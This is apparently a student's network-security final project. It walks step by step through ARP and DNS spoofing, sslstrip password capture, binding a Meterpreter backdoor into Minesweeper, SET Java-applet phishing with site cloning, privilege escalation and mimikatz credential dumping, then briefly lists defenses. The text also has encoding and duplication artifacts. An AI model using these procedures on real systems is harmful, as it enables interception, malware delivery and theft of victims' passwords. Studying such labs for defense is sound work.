1
Network Exploits And Vulnerabilities Final Project
Introduction Everyday, a computer is vulnerable to exploitation by hackers who know how to use malicious, 0-day exploits just by a click of a button and a few scripts of their own. They range from the apprentice (script-kiddie) to the journeyman, to the master hacker. We must be careful and gain that in-depth knowledge to know our offensives and defenses. We as network security professionals must together collect and master a gamut of skills to know our attackers better before they wage cyberwar. Sun Tzu once said, “Rouse him, and learn the principle of his activity or inactivity. Force him to reveal himself, so as to find his vulnerable spots.” To understand a hacker’s mind, we too must conduct detailed analysis of exploits and malicious software. Today’s network is facing various attacks such as the ones described in this report, because people are unaware that they are being socially engineered or are not patching security updates — even updating their virus definitions to the latest. As a matter of fact, some people are insecure to the point that they do not use virus To understand a scanners. hacker’s mind, we too must conduct detailed analysis of exploits and malicious software.
Throughout this report, I will be using Kali Linux 1.1.0a, the Metasploit toolkit combined with the Armitage GUI, Ettercap for spoofing and MITM (manin-the-middle) attacks. I will be using Wireshark for the dumps, including the Social Engineering Toolkit (SET) to demonstrate my hacks. I will reveal these examples in precise documentation so that you will have a better glimpse of what hacking and exploiting from an attacker to a victim machine looks like.
2
Network Exploits And Vulnerabilities Final Project
Three Scenarios First Scenario: Spoofing and Man-In-The-Middle (MITM) attacks
Our first scenario requires us to understand, perform, and analyze Active Sniffing of a Switched LAN.
Primary Objective:
Using Ettercap to carry out the following exploits:
The ARP Spoofing and Man-In-The-Middle attack
DNS Spoofing Attack
SSLstripping using Ettercap to carry out a password stealing attack.
Second Scenario: Post Exploitation with Armitage and Meterpreter
Our second scenario requires us to generate the following Payloads using Metasploit applying the Reverse TCP and Reverse http payload for exploiting both TCP and HTTP vulnerabilities.
Primary Objective:
Combine the Meterpreter payload with a legitimate program (using a basic binder) to run an exploit on the victim’s machine. Using that vulnerable machine to do post exploitation attacks such as dumping hashes, live sessions, screenshots, camera activation, etc.
Third Scenario: The Social Engineering Toolkit (SET)
Using SET to illustrate that indeed the weakest link in the network is the human element.
Primary Objective:
To use SET to select the following “Web Site Attack Vectors” and to utilize the Java Applet vulnerability.
To carry out two exploitation methods:
1)
Web Template method
2)
Site Cloner method
3
Network Exploits And Vulnerabilities Final Project
First Scenario: Spoofing And Man-In-The-Middle Attacks Before we head onto how the attacks will work, we first need to define a couple of terms. ARP Spoofing: An ARP (Address Resolution Protocol) Spoofing attack is a man-inthe-middle attack in which a malicious actor sends falsified ARP message over a LAN repeatedly. The result of the attack links the attacker’s MAC address with the IP address of a legitimate computer or server of the current exploited network. Once the attacker has a hold of ARP spoofing, the attacker can intercept, modify, or even stop data-in-transit. ARP Man-In-The-Middle Attack: The man-in-the-middle attack intercepts the attacker’s machine between one machine to another, because he or she uses that machine to become a middleman. That way, he or she can intercept routing information and become a listener to all communications that are intercepted in the process. DNS Spoofing Attack: The DNS Spoofing attack replaces the routing protocol’s DNS entries with a malicious DNS so that the traffic is redirected somewhere else, where the attacker wants it. SSL Strip Attack: A dangerous SSL attack that strips HTTPS from pages and to give the end user a HTTP page (with no security, no encryption), while redirected to another port.
4
Network Exploits And Vulnerabilities Final Project
First Scenario: Spoofing And Man-In-The-Middle Attacks The following is an illustration of ARP Spoofing. Diagram of ARP Spoofing And Man-In-The-Middle: Router’s IP: 192.168.1.254 Victim’s IP: 192.168.1.67
Attacker’s IP: 192.168.1.67
Attacker uses ettercap to spoof the victim’s IP 192.168.1.71 on the eth0 network.
Demonstration of ARP Spoofing And Man-In-The-Middle Attacks Through Driftnet and Urlsnarf:
1. We will be using port forwarding for this so type the following above. echo 1 >> /proc/sys/net/ipv4/ip_forward By default, port forwarding is not used in Kali Linux. We generally want to use our computer to act like a router . The computer uses packets that come inside and forwards that to another destination.
5 Network Exploits And Vulnerabilities Final Project
2.
For this experiment, we will demonstrate the ARP Spoofing technique where we use Ettercap to pretend to be the router (the man-in-the-middle) then as a result capturing packets sniffed throughout the network. And, also by using a program called driftnet, we can capture unencrypted images viewed on the network as a mitm (man-in-the-middle) attack.
3.
We will start off by doing an ettercap –M arp /192.168.1.254/ (router IP) /192.168.1.71/ (victim IP) -p –T –q –i eth0 (access point) This command when executed spoofs (arp poisons) your IP with the router IP, so that you can access the man-in-the-middle. And, then you can access as the router so that you can sniff packets or images from 192.168.1.71, the victim IP address, for example. When spoofed, the below will show up.
4.
Next, open a new tab and then, we are going to perform a man-in-the-middle attack using the program, driftnet. You can sniff it by typing driftnet –i eth0.
6 Network Exploits And Vulnerabilities Final Project
5.
So, as you can see here, we have performed a ARP spoofing attack and sniffed using the driftnet software to capture images in the ARP.
6.
Next, to even analyze the network on a deeper level, we can use the program urlsnarf to intercept websites passed through after ARP spoofing/poisoning.
7.
The command we must type in order to sniff URLs passed between the router (our machine) is this: urlsnarf –i eth0.
7 Network Exploits And Vulnerabilities Final Project
Wireshark Analysis: The following is a Wireshark analysis of the ARP spoofing captured in the process. Note that there is a duplicate use of 192.168.1.71 detected, which indicates an ARP Spoof and MITM attack!
Diagram of DNS Spoofing Attack:
www.facebook.com
www.fakebook.com 1.
Legitimate DNS Request Destined for DNS Server.
2.
False DNS provided from victim to attacker.
3.
Victim begins communicating with www.fakebook.com, a malicious site as a result.
Demonstration of DNS Spoofing Attack On A LAN: The following example will be a DNS spoofing attack on the LAN. Like the previous example, first, we need to set up port forwarding by doing an: 1.
echo 1 > /proc/sys/net/ipv4/ip_forward
For this scenario, my IP will be 192.168.1.71. The target IP for this scenario will be to target all DNS requests on the router, 192.168.1.254. Now, let’s edit etter.dns at /etc/ettercap/etter.dns by typing: 2. leafpad /etc/ettercap/etter.dns
8 Network Exploits And Vulnerabilities Final Project
3.
Here’s the code to the DNS etter.dns to make it work. Google.com will be successfully redirected to 206.190.36.45, which is www.yahoo.com’s IP address and Facebook.com will be successfully redirected to 108.174.10.10, which is www.linkedin.com.
CODE# google.com
A 206.190.36.45
*.google.com A 206.190.36.45
www.google.com PTR 206.190.36.45 facebook.com A 108.174.10.10 *.facebook.com A 108.174.10.10 www.facebook.com PTR 108.174.10.10
Having these settings, you can start to spoof DNS on Kali Linux by using the command-line format like this. 4.
ettercap –T –q –i <interface> -P <plugin> -M arp // // In our case, we will type ettercap –T –q –i eth0 –P dns_spoof –M arp // //
9 Network Exploits And Vulnerabilities Final Project Wireshark Analysis: As you can see in this Wireshark capture, accounts.google.com was redirected to 206.190.36.45, which is yahoo.com (but could also be replaced with any malicious site by the attacker IP. This is an example of DNS spoofing, across the wire.
Diagram of SSLStrip Plugin in Ettercap and Password Stealing Attack:
GET http://my.bcit.ca
GET https://my.bcit.ca
SSL Strip
Browser
Browser loads http:// my.bcit.ca instead of https://my.bcit.ca because it is SSL Stripped and modified.
Web Server
HTML response
Demonstration of Password Stealing Attack using SSLStrip Plugin in Ettercap: The following is a demonstration used to enable the sslstrip plugin in Ettercap and carry out a password stealing attack. 1.
First, it is necessary to setup port forwarding if you havenâ&#x20AC;&#x2122;t.
In the terminal, do a $echo 1 > /proc/sys/net/ipv4/ip_forward 2.
Next, do a cat /proc/sys/net/ipv4/ip_forward
To make sure that it works, you should have 1 as your result in your output. 3.
We will now set the iptables to redirect everything that comes from port 80 to port 8080. Our main objective here is to do exactly what the program sslstrip means. It is to strip HTTPS from pages and to give the end user a HTTP page (with no security, no encryption). So, the port weâ&#x20AC;&#x2122;ll use to redirect the striped content to will be port 8080.
10 Network Exploits And Vulnerabilities Final Project
4.
To do port redirection, we will need to configure iptables with this command:
Iptables –t nat –A PREROUTING –p tcp —destination-port 80 –j REDIRECT —to-port 8080 5.
To confirm that the port redirection is there, we will then, do an:
Iptables –t nat –L
To make sure that you are on the right track, you should be able to see tcp dbt: http redir ports 8080 6.
We now want to spoof the ARP on the IP to trick it to thinking that we are sending packets from the router’s IP address.
The command here is: arpspoof –i <interface name> -t <target IP address> -r <router IP> As a complete command, now I will type the following: arpspoof –i wlan0 –t 192.168.1.71 –r 192.168.1.254
11 Network Exploits And Vulnerabilities Final Project
6. Now, you should open another tab or another terminal and type the following: sslstrip â&#x20AC;&#x201C;l 8080 â&#x20AC;&#x201C;a (which logs all SSL and HTTP traffic to and from the server). Now, you can do the sslstripping.
7. On the victim machine, we will attempt to do an sslstrip to my.bcit.ca. Notice that on the bcit page, the https protocol is removed because we used sslstrip.
8.
By default, the sslstrip.log file should be stored in the /root/folder in Linux. Now, do a leafpad sslstrip.log and log the sslstrip that is going on.
12 Network Exploits And Vulnerabilities Final Project 9.
If we do a keyword search on the .log file using leafpad of the username A00799452, we will find a password beside it, which is censored due to security reasons.
Wireshark Analysis:
Just by looking at this tcp stream, we can identify that the HTTP connections are not encrypted. And, that sslstrip has stripped away the HTTPS layering protocol upon that.
13 Network Exploits And Vulnerabilities Final Project
Second Scenario: Post Exploitation With Armitage and Metasploit Definitions: Armitage: Armitage is a exploitation tool using the framework of Metasploit as a framework. It is a GUI designed as an attack management tool that visualizes targets and recommends exploits. Reverse TCP: This is an Armitage / Metasploit exploit used to bind to instances where the exploit is hidden in a vulnerable personâ&#x20AC;&#x2122;s computer. It listens to vulnerable TCP ports and sends its payload stealthily along the system once the victim has accepted the request. Reverse HTTP: This is another Armitage / Metasploit exploit used to bind to instances when loaded in a vulnerable personâ&#x20AC;&#x2122;s computer. It listens to vulnerable HTTP ports (usually port 80 or any given port). When a victim goes to the webpage and also clicks on the program, then that person is open to exploitation. Binder: This is a binding software that usually binds two different .exe files together. IExpress.exe is an example of a software that binds. When run in administrator mode, it can combine two instances of .exe files together. This program is usually used to bind exploits and innocent looking programs together, so that the exploit may in fact may be packed.
13 Network Exploits And Vulnerabilities Final Project 14
Second Scenario: Post Exploitation With Armitage and Metasploit Metasploit Exploitation Diagram:
Sends reverse tcp and reverse HTTP requests for victim. Binded Meterpreter runs on victim’s machine.
Demonstration Of Armitage Used For Exploiting The Following Vulnerability: Reverse TCP The main program we are going to use is Armitage, used for exploiting the following vulnerabilities: Reverse TCP and Reverse HTTP. We are also going to use a binder to bind the exploit with a normal application program, so that the process of receiving the program (exploit) acts more legitimate to the end user. *NOTE: In order for the Armitage exploit to work on the victim’s computer, we must disable AntiVirus on the victim’s machine. Please disable any antivirus programs such as AVG, Avast, Windows Defender or Microsoft Security Essentials before starting.
Reverse TCP: 1.
To begin the process, we will start the postgresql and metasploit services running in the background by typing:
service postgresql start service metasploit start
13 Network Exploits And Vulnerabilities Final Project 15
2.
Now, go to into Armitage, by going to the Kali Linux Applications menu > Kali Linux > Exploitation Tools > Network Exploitation > Armitage. If asked for a username and password, you can set that to the default settings.
3.
Once you are in Armitage, go to the Hosts menu > NMap Scan > Intense Scan. As a scan range, you can enter the target IP address which is 192.168.1.71 (or whatever the IP is).
4. Once the nmap is completed, it should detect that the machine is indeed a Windows machine.
13 Network 16 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Preparing The Exploit And Binder: 1.
Under the search bar in Armitage, type in meterpreter.
2.
Find the Windows exploit version for reverse_tcp.
3.
Next, double-click on it. Or, drag it onto the Windows computer.
4.
Note down the port number, which is 6687, in this case (or it could really be anything listening).
13 Network 17 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
5) You want to make sure you save the exploit as backdoor1.exe, since that would be our backdoor we use for entry into the machine. Now, we can pack the exploit in Windows. We will use Iexpress for this task. Note, if you are using Windows 8, open the Iexpress application from the Windows 8 sidebar. Make sure that from Windows 8, you are running from Run As Administrator mode.
Binding The Exploit (backdoor.exe) into Minesweeper.exe To download Minesweeper.exe, you must go here: http://www.minesweeper.info/downloads/MinesweeperX.html For the next few steps, we will bind the exploit onto Minesweeper.exe.
13 Network 18 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
1.
First, click on Create new Self Extraction Directive file. Click on Next.
2. Then, click on Extract files and run an installation command. Click on Next.
13 Network 19 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
3.
When you are ready to start, name your package title, Super Minesweeper.exe. Then, click on Next.
4.
Click on No prompt. Then, click on Next.
13 Network 20 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
5.
Click on Do not display a license. Then click on Next.
6. Add the two files that you want to combine, which are backdoor1.exe and Minesweeper.exe
13 Network 21 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
7. For the Install Program select Minesweeper.exe, since this is the program that you want to install. And, for the Port Install Command, select the binder program which is backdoor1.exe.
8. Select Hidden in this option and click on Next.
13 Network 22 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
9. Click on No Message. Then, click on Next.
10. At this point, name your file Super Minesweeper.exe. Then, check Hide File Extracting Pro gram Animation from User. Click on Next.
13 Network 23 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
11. Click on No restart. Then, click on Next.
12. Click on Donâ&#x20AC;&#x2122;t save. Then, click on Next.
13 Network 24 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
13. Once you are ready to create the package, click on Next
14. Click on Finish to finalize. Once SuperMinesweeper.exe is binded, it can be run from the victimâ&#x20AC;&#x2122;s machine, which makes a reverse_tcp connection with the attackerâ&#x20AC;&#x2122;s machine like a client and server. This exploit (malware backdoor) can be downloaded from any malicious site that contains the malware. And, can be used for targeting people that downloads any suspicious software from the Internet that is malicious.
13 Network 25 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Creating A Listener And Listening For The Port: To create a Listener, please follow these steps. It is necessary for a listener to be there to create a remote connection to the victimâ&#x20AC;&#x2122;s PC. In Armitage: 1.
Click on the Armitage menu > Listeners > Reverse (wait for)
2.
Then, enter your port number that you earlier received from LPORT.
Executing The Backdoor: If you are ready to launch the backdoor, just double-click on Super Minesweeper.
13 Network 26 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Observing And Exploiting From Meterpreter:
This is what it looks like if we have established a meterpreter on Armitage. To open a command shell to establish a live session: 1.
Right-click on the vulnerable machine.
2.
Left-click on meterpreter #.
3.
Then, click on Interact.
4.
Then, click on Command Shell.
13 Network 27 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Browsing Files In A Live Session: To browse files upon the system, you need to:
1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Then, click on Explore. Click on Browse Files.
Taking A Screenshot With Meterpreter: 1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Click on Explore. Click on Screenshot.
13 Network 28 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Taking A Webcam Shot With Meterpreter (Camera Activation): 1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Click on Explore. Click on Webcam Shot.
Other things you can do when you have full privileges, not shown in this example because of restriction issues: Dumping (registry) Hashes: 1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Then, click on Access. Click on Dump Hashes.
13 Network 29 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
4.
Then, Command Shell.
Browsing Files In A Live Session: To browse files upon the system, you need to:
1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Then, click on Explore. Click on Browse Files.
Taking A Screenshot With Meterpreter: 1. 2. 3. 4.
Right-click on the vulnerable machine. Left-click on the established meterpreter #. Click on Explore. Click on Screenshot.
13 Network 30 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Wireshark Analysis:
As you can see from this Wireshark capture, the exploit is running through the TCP packets. If we do a TCP Stream, we can see the exploit code of backdoor1.exe or Super Minesweeper.exe in ambiguous characters.
Demonstration Of Armitage Used For Exploiting The Following Vulnerability: Reverse HTTP: In this demonstration, we will use make the user click on an exploit on a webpage. And, then, from there, make them click on an infected backdoor which will allows a meterpreter session on their computer. Thereby, this is how to make the target machine vulnerable.
13 Network 31 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
1.
In order to successfully attack this machine, we would need to first double click reverse_http.
2.
Next, you must specify the LPORT (listening port) to be port 80, which is mainly what the Apache HTTP server uses.
13 Network 32 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
4.
Now, we want to make a new .exe backdoor, save it, and then combine it with Super Minesweeper.exe.
5.
To be bind it with Super Minesweeper.exe, follow the above instructions.
6.
Click on Super Minesweeper.exe when you are ready.
7.
If you go back to the attackerâ&#x20AC;&#x2122;s machine, which is 192.168.1.77, you should see a vulnerable (exploited) machine with Meterpreter on it.
13 Network 33 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Now, you can complete the above activities that were done similarly with Reverse TCP. You can basically carry out activities such as dumping hashes, live sessions, screenshots, camera activation, etc.
Wireshark Analysis:
When viewed under Wireshark, this exploit takes advantage of the HTTP protocol. Then, through that, pushes in a backdoor transmission by taking advantage of the TCP protocol for file transfer. This .pcap shows that the victim IP, 192.168.1.72 connecting with 192.168.1.77, the attackerâ&#x20AC;&#x2122;s IP.
13 Network 34 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Third Scenario: The Social Engineering Toolkit (SET) Definitions: Social engineering: Social engineering is a hacking technique where hackers intrude the weakness of the human element, the mind, and totally relies on the human interaction and often involves tricking people into breaking normal security practices. Social Engineering Toolkit (SET): The Social Engineering Toolkit is a toolkit which mimics websites and masquerade in being the real thing, while, momentarily, if any victim clicks on their web-generated content such as to download a fake Java applet, then they would be exploited by an exploit such as reverse_tcp. Java Applet Vulnerability: This Is a social engineering exploit in which the user clicks on a falsely generated Java Applet vulnerability, which states that you need to update your Java. If clicked and executed, it will act as a backdoor in the background. Moreover, it acts as a dangerous payload that can start a meterpreter shell in the background if launched. Mimikatz: This is a password program that is launched and opened in the victimâ&#x20AC;&#x2122;s machine in the post-exploitation phase. If opened, it can pull up and dump the main passwords and hashes of the local users of that Windows system.
13 Network 35 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Third Scenario: The Social Engineering Toolkit (SET) The following is an illustration of the social engineering toolkit.
Social Engineering Toolkit Diagram:
Demonstration Of Social Engineering Toolkit Using Web Template Technique: Pre-exploitation Phase: We need to run these commands in the terminal for the pre-exploitation phase. 1.
Do an apt-get update
2.
Do an apt-get install metasploit
3.
Do an apt-get install set
4.
Type in gem install rake
Exploitation Phase: Web Template Method: 1.
First, start up Social Engineering Toolkit 6.3 by going to the Terminal and typing in setoolkit.
You should then get this screen.
13 Network 36 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
2.
Choose Option 1.
3. Next, choose Option 2, which is Website Attack Vectors.
13 Network 37 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
4.
Choose Option 1, for Java Applet Attack Method.
5.
Next, choose Option 1, again, for Web Templates.
6.
Next, when asked whether you are using NAT/Port Forwarding, answer yes.
7.
Then, type in the IP address to SET web server, which can be your SET server. In my example, I entered 192.168.1.77 (things may change), the IP address of my Kali Linux machine.
13 Network 38 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
8.
When asked whether the payload handler [metasploit] is on a different IP from your external NAT/Port FWD address, answer no.
9.
On the next option, go for option 2, which states that you want to use the applet built into SET.
10. Select Java Required, the first option for the template. 11. Then, next, when asked for the payload, type in 1 for Meterpreter Memory Injection.
13 Network 39 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
12. Then, choose option 1 again, which is Windows Meterpreter Reverse TCP. 13. Once you have the payload listening on the attacker side, you can proceed to the next step.
13 Network 40 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
14. Open a Firefox browser to test your payload. You should get something like this. If your Java software has blocked this from happening, you need to unblock the attacker’s IP address.
15. Once you have a meterpreter session established, type in sessions. 16. The attacker now has full access to the target machine. At this point, we can establish an interactive session with the target machine using the “sessions –i” command, and issue Linux commands to browse through a compromised system, upload and download files from a system, get a remote command shell, etc. 17. Now, do a sessions –i 1 to get access to the compromised machine in session 1.
13 Network 41 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
18. Next, open a shell on the attackerâ&#x20AC;&#x2122;s computer. Type shell within meterpreter. Obtaining Passwords from Mimikatz: I will for the next experiment obtain the current Windows passwords (in plain text) for all of the accounts on the target system.
1.
First, establish a shell for mimikatz by typing shell in the meterpreter. Go to your chosen directory and do a mkdir mimikatz in your chosen folder of where you want to place it.
2.
Next, do an exit on the shell to go back to the meterpreter session.
13 Network 42 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
3.
In your meterpreter session, do a c:\users\Nathan to go into the victim machineâ&#x20AC;&#x2122;s victim folder.
4.
Now, do an upload of all the files in the mimikatz folder to your victimâ&#x20AC;&#x2122;s machine by typing in something like this:
upload /root/mimikatz_trunk/x64 c:\\Users\\Nathan\\mimikatz Next, we will run the mimikatz program. 5. If you are attacking (exploiting) a Windows 8.1 machine, you need to follow these steps in order to getsystem privileges in order use mimikatz. First, create a local Windows account such as NatheAdmin. Note that Microsoft accounts will not work, because they are synced via a Windows live account instead of the UAC or SYSTEM.
13 Network 43 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
6.
First, in your meterpreter session, do a background. Then, use exploit/windows/ local/ask. We use ask, the exploit, because it is designed to escalate privileges in Windows 8.
7.
Next, do a session â&#x20AC;&#x201C;l
8.
Then, do set session 3
9.
Type in show options.
10. Do set lport 554. 11. Then, type in exploit. 12. If you already have created that local user account in Windows, you can then type getsystem. 13. Next, do a getuid. This will allow you to check which administration roles you have on the hacked computer. You now have NT AUTHORITY\SYSTEM, meaning you have full UAC rights to the system.
13 Network 44 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project 14. Type shell within the meterpreter console. Then, do a dir. If you are in the right directory, you should be able to do a mimikatz, which generates a mimikatz terminal within the victimâ&#x20AC;&#x2122;s machine.
15. If you are unable to reach the mimikatz directory, go into it, and verify that you are in the right directory to run mimikatz.
16. Now, if you are ready to start the exploitation process, then type in mimikatz.
13 Network 45 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
17. Now, do a command sekurlsa::logonPasswords full to get a dump of passwords recovered in the LS of Windows.
Demonstration Of Social Engineering Toolkit Using Site Cloner Technique:
1. If you havenâ&#x20AC;&#x2122;t already, execute the social engineering toolkit by going to the Terminal. And, by typing in setoolkit. Choose option 1.
13 Network 46 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
2.
Select option 2 for Website Attack Vectors.
3. Select Option 1, which is the Java Applet Attack Method
13 Network 47 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
4.
Then, you can select option 2, which is Site Cloner.
5.
When asked if you want to do a NAT/Port Forwarding, answer yes.
6.
Also, when asked for an IP address to the SET web server, type in 192.168.1.77.
7.
When asked if your payload handler is on a different IP from your external NAT/Port FWD address, answer no.
8.
Also, choose option 2 to use the applet built into SET.
9.
For the URL we want to clone, please enter the address such as http:// www.facebook.com
13 Network 48 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
10. For what payload to generate, select option 1. 11. Leave the PORT of the listener to 443 to default by pressing ENTER. 12. For entering the number of for the payload, enter number 1, typical Windows Meterpreter TCP exploit. 13. Once you load the exploit using Social Engineering Toolkit, you should get something like this.
13 Network 49 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
14. Now, go to your victimized IP address, which is 192.168.1.67, and accept the Java applet. Check the box, I accept the risk and want to run this application. Then, click on Run.
15. If you go back to your terminal, a meterpreter session should be established. You can then run a sessions â&#x20AC;&#x201C;l to see which meterpreters are open. Then, repeat the above steps for a mimikatz exploit and password dump. Wireshark Analysis:
Throughout these two exploits of The Social Engineering Toolkit, we can examine the exploit carrying out two methods: the Web Template and site cloner. They especially use the Reverse TCP exploit, which transfers a reverse connection to TCP exploiting the target. When we do a Follow TCP Stream, we can see that indeed, there is exploit code travelling along the TCP Stream. This is what exploits the victim machine if we examine this network forensically.
13 Network 50 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Defense Measures Against Exploits: ARP Spoofing And Man-In-The-Middle Attacks: Preparation
SANS Institute states that the best method of defending against ARP spoofing attacks is to know thy system extremely well. If your network is static or has a few changes, then it is a good measure to include design and documentation. SANS also states to keep in mind that most IDS systems do little to monitor or alert suspicious ARP activity.
Host Hardening
SANS states that ARP tables can be statistically mapped using the arp –s command. It is warned that static mapping should be tested with your OS for durability during ARP attacks. The network administrator or security analyst should always inventory their network host operating systems for their response to ARP attacks so that they know what the network is vulnerable to.
Switch Hardening
Like many switches, Cisco’s IOS protects against ARP attacks. It has a technique that by limiting the number of hardware addresses per port to one, a host cannot change his hardware address on the fly or try to map multiple MAC addresses to route traffic out one port.
DNS Spoofing Attack: Firewall Protection
SANS states “The IANA has assigned TCP and UDP ports 53 to DNS queries. If you are running a single purpose DNS server, then firewall rules should be written to only allow traffic to port 53 bound for the DNS server.” SANS summarizes that since TCP connections are established for zone transfers, the firewall should only allow TCP port 53 from authorized slave name servers.
Network Protection
SANS regards that there is no absolute reason that an external DNS server should receive queries from IANA Private Reserved source IP addresses as defined in RFC 1918. In addition, it is also stated that private addresses should never traverse an Internet router. Therefore, SANS accepts that it good practice to set up access lists on Internet routers to block all traffic from RFC 1918 address space.
DNS Management Software
Software such as BIND can be used to manage DNS. The good thing about DNS management software is that it can automatically backup currently your configuration data on the management server. “As soon as you have restored a hacked DNS server”, SAN states, “you can quickly and easily generate the configuration files needed for BIND to function properly.”
13 Network 51 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Defense Measures Against Exploits: (Continued) SSLStrip Prevention: Education
We should educate the people using the network that it is definitely unsafe when they visit a site like paypal.com with no SSL encryption. It is easy for an attacker to get hold of important and valuable information just by sniffing.
Use HTTPS Plugins While Browsing
HSTS is a software that allows habitual web surfers to surf with security. It is built a plug-in built into Google Chrome and Firefox. it allows us to specify sites that are always HTTPs to stay that way.
Prevention against Armitage and Meterpreter (Metasploit) Attacks Patching With The Latest Service Pack
Patching your system with the latest secure service pack can stop most of the holes already in a system.
Running Processes With The Least Privileges
We can prevent maximum exploitation by also maximizing our defences and use the least privileges when it comes to exposing software holes. You can set up higher security and then limit network access to only trusted hosts within the system.
Prevention Against Social Engineering Toolkit And Social Engineering Attacks Setup A Security Awareness Program On Social Engineering Attacks:
Security “experts” must teach those who are less educated about security to prevent social engineering attacks from happening. It should always be recommended that they are taught the tricks of the hacking trade. To defend a hacker from exploiting you in a form of a malicious webpage, you must think like one and resist against their snares.
Block Malicious Websites By Using Protected Safety Plugins
When browsing and surfing the web for important information on the net, it is easy to come across social engineering attacks on websites. You can use plugins to block you from visiting these sites. They will usually and preferably give you a rating of how safe a site is before you access it.
Update Your Virus/Malware Scanner To The Latest Definitions Often
When you have a virus/malware scanner, you can update it to use the latest definitions so if any threats or malicious payloads are detected, they won’t seep through your system because they are caught and then quarantined.
13 Network 52 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
Conclusions and Recommendations To conclude, it is only right to understand the right mindset and skillset of a hacker. That hacker’s attack can be mitigated when we have also the right mindset to defend from his or her attacks. This cyber war isn’t finished and will never be. So, we must keep updating our security with the number one most important feature which is an upgrade to our technobrain. After all, exploiting known vulnerabilities will never get through if we have the right patches and the right programmers to fix the bugs. Again, man-in-the-middle attacks can be stopped if intruder IP addresses are detected with fortified IDPSes before our networks get demolished. And, meterpreter payloads wouldn’t be alive if the latest virus and malware definitions were scanned for. It is necessary to think like a hacker by doing what a hacker does just like a monkey sees and a monkey does to replicate the mirror. We must also mirror attackers and protect victims by securing them with digital tourniquets aiding them from another digital attack. Although sophistication from this day in age has skyrocketed, our goal should never be to stop protecting those we care about and care for.
13 Network 53 NetworkExploits ExploitsAnd AndVulnerabilities VulnerabilitiesFinal FinalProject Project
References 1.
Address Resolution Protocol Spoofing and Man-In-the-Middle-Attacks (2006). SANS Institute Infosec Reading Room.
2.
A Proactive Defense to Social Engineering (2001). SANS Institute Infosec Reading Room.
3.
Defense in Depth for DNS (2003). SANS Institute Infosec Reading Room.
4.
Lewis, N. (2014, May 1). Stop attackers hacking with Metasploit. Retrieved July 19, 2015, from http://searchsecurity.techtarget.com/tip/Stop-attackers-hackingwith-Metasploit
5.
Tzu, S., & Bowden, T. (2010). The Art Of War the Ancient Classic. Chichester: John Wiley & Sons.